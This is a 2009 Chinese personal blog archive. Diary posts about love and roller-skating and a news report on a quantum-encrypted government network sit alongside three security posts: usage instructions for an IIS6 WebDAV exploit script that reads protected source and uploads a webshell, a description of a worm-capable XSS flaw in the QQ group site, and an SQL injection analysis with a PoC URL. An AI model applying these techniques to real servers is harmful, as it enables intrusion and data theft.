那晚看到你发给我的信息,我不知道当时我该如何回复你,你认为我在徘徊,其实不是这样,我只是坚信我自己的选择,并不是保护自己,只是你一直没有一个很好的自己的决择,我要怎么来选择了,是看着你成为别人的新娘然后在转身走出礼堂,还是和别人公平竟争,但机会有多大,这些都是我必须要面对面对的问题

其实事情并不是你想的那么完美,只是都在等谁先放手,等待宣判,最后的结果又会是怎么样了,小傻瓜,请不要在对我说,你不适合我,什么事情都没有决对的。那晚想给你讲的太多,就想打个电话能和你讲的很明白,我控制自己,所以唯一的只是一个邮件,事情永远都在变化,最后会变成什么样,可能你比我预估的更好,但感情是谁也控制不了的,当局者迷,一切自有定数,其实完全在与制的判断,我努力了,争取了,就像晚上小卢说我那样,感情该争取时就争取,不然很容易就错过

喜欢你我就会遵守游戏规则,当然这个规则是你的规则,感情就是这样,选择谁是你的权力,我唯一能做的就是在你的规则内完成我该做的事情,能否达到你的意愿就不知道,因为我不是你,不知道你在想什么,我没超能力,我能做的只是预估和判断,但有一点是不会变的,喜欢你是我的权力,选择谁是你的权力,谁也没办法改变……

五月 31st, 2009

Posted In: 未分类

By racle@tian6.com && securiteweb.org
Source:www.tian6.com && www.securiteweb.org

IIS6.0 WEBDAV 漏洞录像和相关介绍论坛都发了好几天了.milw0rm.com昨天也公开了一个C版本利用程序.他的效果我不知道,还没有使用过.
现在tian6.com国内首先公布一个脚本EXP.

其实前天就想写一份无须编译的EXP.可惜手上没有环境,构建又太麻烦,所以昨天找了个朋友,一起写完这份EXP.
已经公布

使用说明:(具体使用或者测试方法,请参照天阳发的录像.)
******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********

Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path www.tian6.com /secret/
Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
复制代码
example:
php.exe i.php source www.tian6.com /blog/readme.asp
//查看tian6.com,受保护目录blog里的readme.asp源代码

php.exe i.php path www.tian6.com /secret/
//查看tian6.com,受保护目录secret里的所有目录.

php.exe i.php put www.tian6.com /secret/ test.txt
//test.txt和i.php放在一起,里面是你的WEBSHELL.这里的意思是在www.tian6.com受保护的目录secret里,从本地文件test.txt里读取内容,然后写到secret目录下.默认是racle.asp.但是这里有个问题,secret目录是受保护的,写进去一样不能运行.这里有个很简单的技巧,大家仔细看看录像吧.

五月 27th, 2009

Posted In: 未分类

傻宝宝,天天是怎么了,只希望你能很开心,也非常希望可以常和你在一起,只是不能拿三年和三个月来做对比,这个没有可比性,傻瓜,日子总是要过的吗
什么事情都少想一点,努力提升自己,不要总钻牛角尖,有些事情是没有结果的,偶不发表任何观点,但我保留意见

五月 25th, 2009

Posted In: 未分类

中科院院士郭光灿介绍“量子政务网”

中科院量子信息重点实验室博士生陈巍介绍文件加密后的不同

“量子政务网”关键设备全通型量子路由器

中广网芜湖5月18日消息(记者刘军通讯员胡胜友)记者今天从中国科大中科院量子信息重点实验室获悉,该实验室与安徽芜湖市政府合作,在芜湖建成了世界首个“量子政务网”。“量子政务网”运用了量子保密通信技术,能够确保信息量巨大的声音、文件、动态图像的绝对安全通信,投入使用后将不必再担心黑客的攻击和木马的窃听,实现真正意义上的保密通信。

据了解,首期建成的芜湖“量子政务网”连接了芜湖市科技局、招商局、经贸局、总工会和质监局等市政机关及芜湖市电信大楼8个用户,设置了4个全通主网节点和三个子网用户节点以及1个用于攻击检测的节点,长15公里。

中国科大教授、中科院院士郭光灿介绍说,量子保密通信技术基于量子力学原理,能确保两地之间密匙分配的绝对安全性,从而保证了通信的绝对安全。中国科大中科院量子信息重点实验室通过大量的基础性研究,从根本上解决了量子信号光纤传输的稳定性和量子路由问题,解决了量子信号在商用光纤上运用的技术难题。芜湖 “量子政务网”融合了国际上现有的三种组网技术,首次设计出具有多层次、旨在满足不同用户需求的多功能量子保密通信网络,通过该网络可以完成任意两点之间的绝对保密的通信过程。

中国科大教授韩正甫表示,芜湖“量子政务网”所使用的核心器材和设备,包括最关键的光电调制芯片,全部为我国自主研发或与国内单位联合研制,整个网络已经实现了国产化。这一成果使我国具有全部知识产权的单向量子保密通信方案和设备,以及量子保密通信网络核心组网技术真正在实际工作中得以应用。芜湖“量子政务网”的建成,标志着我国量子保密通信基础研究的成果已经开始向产业化转化。

另据了解,中国科大中科院量子信息重点实验室郭光灿研究团队早在2004年即在北京与天津之间实现了世界上最远距离的125公里商用光纤的量子密匙分配,有力地推进了量子密码技术的实用化。2007年,郭光灿研究团队在北京商用光纤上实现了40公里范围内四用户的城域量子通信网络,完成了世界上首个无中转、任意互通的量子密码通信网络,并在国际上首先在实际地下光缆中进行了诱骗态量子密匙分配实验,安全通信距离达到32公里。

五月 21st, 2009

Posted In: 未分类

原以为我有一场刻刻骨铭心的恋爱,可在另一个朋友的眼中,那根本不算是恋爱,原的我的感情是这么的失败,可以说偶还没有恋爱过,我不知道恋爱的滋味,恋爱的感觉是什么样,是否真的没有可以取带(她)他,我相信我比任何人都能做的更好,至少有一条记录显示偶什么都做到了,以后会是什么样,谁也不知道,不管什么时候,偶都不会经言放弁,除非事实已定,爱情的道路很长,有谁能陪偶走过

或许是酒精的做用,让偶在写下这个日志,不过一切都是事实,不用否认,我相信我和能力,更相信我的人品,不是常有一句话吗,酒品看人品,呵,其实并不是所有的都是这样,我更喜欢西安的一句话
大肚能容容天下可容之事
笑口长笑笑天下可笑之人

希望我爱的人或是我喜欢的人都能这样,晚安各位

五月 13th, 2009

Posted In: 未分类

http://qun.qq.com是一个WEB版的QQ群信息系统,保存着你QQ群的所有信息,包括所有群的历史聊天记录,群论坛,群相册,群成员等模块。其中群的历史聊天记录将会和客户端的群聊天记录同步更新。由于部分模块出现过滤盲点,导致恶意代码可以塞入缺陷模块。恶意代码可以使用worm方式传播,二叉树速度可在短时间内攻陷5000万个QQ群。在获取session后,即可替换身份登录。此时你所有的群信息(历史聊天记录,群分类,群成员)也将大白于天下。

解决方案:在浏览qun.qq.com的时候,暂时可以通过noscript等插件来阻断恶意代码。

五月 8th, 2009

Posted In: 未分类

BY Flyh4t
http://bbs.wolvez.org

上次硬盘坏了丢了很多数据

今天某兄弟生日

掏空我的记忆回想起来一个很老的漏洞

[code]

//inc/mod_tag.php

————————
if (!defined('VALIDREQUEST')) die ('Access Denied.');

if (!$job) $job='default';
else $job=basename($job);
$itemid=safe_convert($itemid);

acceptrequest('tag,rewrite');
if ($tag!=='') $job='show';
$tag=($config['smarturl']==1 && $config['urlrewrite']==1 && $rewrite==1) ? tagurldecode($tag) : $tag;
//缺省情况$config['smarturl']==1 && $config['urlrewrite']==1 这个条件是不成立的,所以不会调用tagurldecode函数
//要管理员使用urlrewite功能才可以

if ($job=='default') {
……….
}

if ($job=='show') {
acceptrequest('mode');
if ($mode==1 || $mode==2) $mbcon['tag_list']=$mode-1;

$m_b=new getblogs;
if ($tag==='') catcherror($lnc[192]);

//$tag 变量进入查询语句,但是需要一个单引号,我们恰好可以通过tagurldecode函数引入单引号
$allentries=$blog->getgroupbyquery("Select * FROM `{$db_prefix}tags` Where `tagname`='{$tag}' LIMIT 0,1");
if (!is_array($allentries[0]) || $allentries[0]['tagentry']=='' || $allentries[0]['tagcounter']==0) {
—————————-

[/code]

$tag 变量进入查询语句是被单引号包围的,但是我们恰好可以通过tagurldecode函数引入单引号,看代码

[code]

function tagurlencode($str) {//编码函数
$str=urlencode($str);
$str=str_replace('-', '–', $str);
$str=str_replace('%', '-', $str);
return $str;
}
function tagurldecode($str) { //解码函数
$str=str_replace('-', '%', $str);
$str=str_replace('%%', '-', $str);
$str=urldecode($str);
return $str;
}

[/code]

这样我们就可以利用这个漏洞

[code]
——————–
poc:
index.php?act=tag&job=show&rewrite=1&tag=aaaa-27
—————
[/code]

五月 8th, 2009

Posted In: 未分类

放个五一真无聊,放假那晚就去鸟巢轮滑练习一个晚上,第二天还加半天班,然后睡了一天,第二天想去打球,结果别人学校不让进,郁闷哪,然后晚上在接着玩,昨天到好跑到朝阳公园玩了一天,早上醒了就穿鞋出发,然后直奔公园进发,装备带的还挺帅,玩的也挺hi,先秀下PP

五月 4th, 2009

Posted In: 未分类

无觅相关文章插件,快速提升流量